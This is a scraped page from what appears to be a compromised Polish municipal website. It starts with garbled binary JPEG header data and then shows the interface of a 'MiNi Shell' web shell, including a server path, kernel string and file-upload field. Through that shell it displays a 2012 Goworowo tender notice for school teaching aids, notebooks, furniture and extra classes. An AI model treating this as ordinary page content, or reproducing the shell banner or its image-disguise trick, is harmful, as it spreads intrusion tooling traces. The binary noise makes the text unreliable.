JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/294788-N-2012.html

<p class="kh_header"><b>Goworowo: Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Goworowo</b><br>
<b>Numer ogłoszenia: 294788 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Goworowo , ul. Ostrołęcka 21, 07-440 Goworowo, woj. mazowieckie, tel. 029 7614066, faks 029 7614043.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Goworowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dokonanie doposażenia bazy dydaktycznej i zakup usługi edukacyjnej w ramach realizacji zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Goworowo w ramach projektu - Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych w gminie Goworowo - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki. Projekt obejmuje swoim zakresem szkoły podstawowe w Goworowie, Pasiekach, Kuninie i Szczawinie na terenie gminy Goworowo. Zamawiający dokonał podziału zamówienia na dwie części:

- część pierwsza: doposażenie bazy dydaktycznej. 
1. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy
pomocy dydaktycznych do prowadzenia następujących zajęć dla dzieci:
1) Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym
także zagrożonych ryzykiem dysleksji.
2) Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności 
matematycznych. 
3)  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. 
4) Gimnastyka korekcyjna dla dzieci z wadami postawy.
5) Zajęcia rozwijające zainteresowania i uzdolnienia uczniów. 
6) Zajęcia rozwijające zainteresowania i uzdolnienia uczniów - artystyczne.
Szczegółowy opis parametrów pomocy dydaktycznych znajduje się w załączniku nr 7 do SIWZ. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 12 miesięcy od dnia odbioru dostawy.
Kod CPV: 39.16.21.00-6 - pomoce dydaktyczne. 

2. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy 2 
sztuk notebooków o parametrach nie gorszych niż opisane w załączniku nr 7 do SIWZ.
Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 24 miesiące od dnia odbioru dostawy.
Kod CPV:  30.21.31.00-6 - komputery przenośne

3. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy mebli szkolnych o parametrach opisanych w załączniku nr 7 do SIWZ.
Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 12 miesięcy od dnia odbioru dostawy.
Kod CPV:  39.16.00.00-1 - meble szkolne

- część druga: zakup usługi edukacyjnej.
W ramach zakupu usług edukacyjnych przeprowadzone zostaną zajęcia szkolne dla wytypowanych grup docelowych. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy. Przedmiot zamówienia obejmuje następujące elementy:

  Szkoła Podstawowa w Goworowie  
    Zadanie 1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.
2012r. - I grupa (6 osób) - 45 h, II grupa (7 osób) - 45h.
razem 90 godzin dla 13 uczniów ogółem.

Zadanie 2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
2012r. - I grupa (6 osób) - 45 h, II grupa (6 osób) - 45h.
razem 90 godzin dla 12 uczniów ogółem.

Zadanie 3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. 
2012r. - I grupa (4 osób) - 45 h, II grupa (4 osób) - 45h.
razem 90 godzin dla 8 uczniów ogółem.

Zadanie 4. Gimnastyka korekcyjna dla dzieci  z wadami postawy. 
2012r. - I grupa (6 osób) - 45 h, II grupa (6 osób) - 45h.
razem 90 godzin dla 12 uczniów ogółem

Zadanie 5. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów.
2012r. - I grupa (7 osób) - 45 h, II grupa (7 osób) - 45h.
razem 90 godzin dla 14 uczniów ogółem

Szkoła Podstawowa w Pasiekach
Zadanie 6. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 7. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 8. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 9. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów.
2012r. - I grupa (11 osób) - 60 h, 
razem 60 godzin dla 11 uczniów ogółem

Szkoła Podstawowa w Kuninie
Zadanie 10. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją.
2012r. - I grupa (9 osób) - 30 h, II grupa (9 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 11. Zajęcia logopedyczne dla dzieci z zaburzeniami mowy.  
2012r. - I grupa (5 osób) - 30 h, II grupa (6 osób) - 30h.
razem 60 godzin dla 11 uczniów ogółem

Zadanie 12. Zajęcia rozwijające zainteresowania  i uzdolnienia uczniów. 
2012r. - I grupa (11 osób) - 50h.
razem 50 godzin dla 11 uczniów ogółem

Szkoła Podstawowa w Szczawinie
Zadanie 13. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją.
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Zadanie 14. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów. 
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Zadanie 15. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów - artystyczne. 
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Szczegółowy harmonogram realizacji zajęć dodatkowych Wykonawca ustali z poszczególnymi dyrektorami szkół podstawowych, na terenie których te zajęcia będą prowadzone. Zajęcia muszą być prowadzone przez wykwalifikowaną kadrę, posiadającą przygotowanie pedagogiczne.
Wszystkie nazwy własne użyte w dokumentacji przetargowej, określające typ produktu lub producenta, zostały podane przykładowo w celu określenia minimalnych oczekiwanych parametrów jakościowych, funkcjonalnych i użytkowych produktu. Dopuszcza się składanie rozwiązań równoważnych do opisanych przez Zamawiającego, zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. W takim przypadku należy wypełnić odpowiednie kolumny formularza cenowego stanowiącego załącznik do niniejszej SIWZ, tj. kolumnę f - Oferowany przedmiot zamówienia (podać dokładny opis i nr stron, na których znajdują się potwierdzenia równoważności oferowanych poszczególnych towarów(produktów) zamówienia ze wskazaniem producenta).
Wykonawca oferując przedmiot równoważny do opisanego w SIWZ jest zobowiązany zachować równoważność w zakresie parametrów jakościowych, użytkowych i funkcjonalnych, które muszą być na poziomie nie niższym od wskazanych przez Zamawiającego. W takim przypadku Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób niebudzący wątpliwości Zamawiającego powinno wynikać, że oferowany produkt ma nie gorsze parametry jakościowe, funkcjonalne oraz użytkowe niż określony przez Zamawiającego.
Wykonawca zobowiązany jest do dołączenia do oferty wypełnionego formularza cenowego, stanowiącego załącznik nr 6 do niniejszej SIWZ, obrazującego poszczególne elementy przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 80.00.00.00-4, 30.21.31.00-6, 39.16.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od pobrania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy i określa następujące warunki takich zmian :

1) termin realizacji przedmiotu umowy w przypadku wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia.
2) wysokość ceny brutto za wykonanie zamówienia w przypadku zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia. W trakcie realizacji przedmiotu umowy, strony dokonają odpowiedniej zmiany wynagrodzenia - dotyczy to części wynagrodzenia za zakres zamówienia, który w dniu zmiany stawki podatku VAT jeszcze nie został wykonany.
3) rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenie terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę.
Powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goworowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można otrzymać w Urzędzie Gminy Goworowo, ul. Ostrołęcka 21, 07-440 Goworowo, pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 09:00, miejsce: Urząd Gminy Goworowo, ul. Ostrołęcka 21, 07-440 Goworowo, pokój nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doposażenie bazy dydaktycznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy
pomocy dydaktycznych do prowadzenia następujących zajęć dla dzieci:
1) Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym
także zagrożonych ryzykiem dysleksji.
2) Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności 
matematycznych. 
3)  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. 
4) Gimnastyka korekcyjna dla dzieci z wadami postawy.
5) Zajęcia rozwijające zainteresowania i uzdolnienia uczniów. 
6) Zajęcia rozwijające zainteresowania i uzdolnienia uczniów - artystyczne.
Szczegółowy opis parametrów pomocy dydaktycznych znajduje się w załączniku nr 7 do SIWZ. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 12 miesięcy od dnia odbioru dostawy.


2. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy 2 
sztuk notebooków o parametrach nie gorszych niż opisane w załączniku nr 7 do SIWZ.
Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 24 miesiące od dnia odbioru dostawy.


3. W ramach doposażenia bazy dydaktycznej należy dokonać zakupu i dostawy mebli szkolnych o parametrach opisanych w załączniku nr 7 do SIWZ.
Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres min. 12 miesięcy od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.21.31.00-6, 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup usługi edukacyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zakupu usług edukacyjnych przeprowadzone zostaną zajęcia szkolne dla wytypowanych grup docelowych. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy. Przedmiot zamówienia obejmuje następujące elementy:

  Szkoła Podstawowa w Goworowie  
    Zadanie 1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.
2012r. - I grupa (6 osób) - 45 h, II grupa (7 osób) - 45h.
razem 90 godzin dla 13 uczniów ogółem.

Zadanie 2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
2012r. - I grupa (6 osób) - 45 h, II grupa (6 osób) - 45h.
razem 90 godzin dla 12 uczniów ogółem.

Zadanie 3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. 
2012r. - I grupa (4 osób) - 45 h, II grupa (4 osób) - 45h.
razem 90 godzin dla 8 uczniów ogółem.

Zadanie 4. Gimnastyka korekcyjna dla dzieci  z wadami postawy. 
2012r. - I grupa (6 osób) - 45 h, II grupa (6 osób) - 45h.
razem 90 godzin dla 12 uczniów ogółem

Zadanie 5. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów.
2012r. - I grupa (7 osób) - 45 h, II grupa (7 osób) - 45h.
razem 90 godzin dla 14 uczniów ogółem

Szkoła Podstawowa w Pasiekach
Zadanie 6. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 7. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 8. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
2012r. - I grupa (6 osób) - 30 h, II grupa (7 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 9. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów.
2012r. - I grupa (11 osób) - 60 h, 
razem 60 godzin dla 11 uczniów ogółem

Szkoła Podstawowa w Kuninie
Zadanie 10. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją.
2012r. - I grupa (9 osób) - 30 h, II grupa (9 osób) - 30h.
razem 60 godzin dla 13 uczniów ogółem

Zadanie 11. Zajęcia logopedyczne dla dzieci z zaburzeniami mowy.  
2012r. - I grupa (5 osób) - 30 h, II grupa (6 osób) - 30h.
razem 60 godzin dla 11 uczniów ogółem

Zadanie 12. Zajęcia rozwijające zainteresowania  i uzdolnienia uczniów. 
2012r. - I grupa (11 osób) - 50h.
razem 50 godzin dla 11 uczniów ogółem

Szkoła Podstawowa w Szczawinie
Zadanie 13. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją.
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Zadanie 14. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów. 
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Zadanie 15. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów - artystyczne. 
2012r. - I grupa (6 osób) - 60h.
razem 60 godzin dla 6 uczniów ogółem

Kod CPV: 80.00.00.00-4

Szczegółowy harmonogram realizacji zajęć dodatkowych Wykonawca ustali z poszczególnymi dyrektorami szkół podstawowych, na terenie których te zajęcia będą prowadzone. Zajęcia muszą być prowadzone przez wykwalifikowaną kadrę, posiadającą przygotowanie pedagogiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com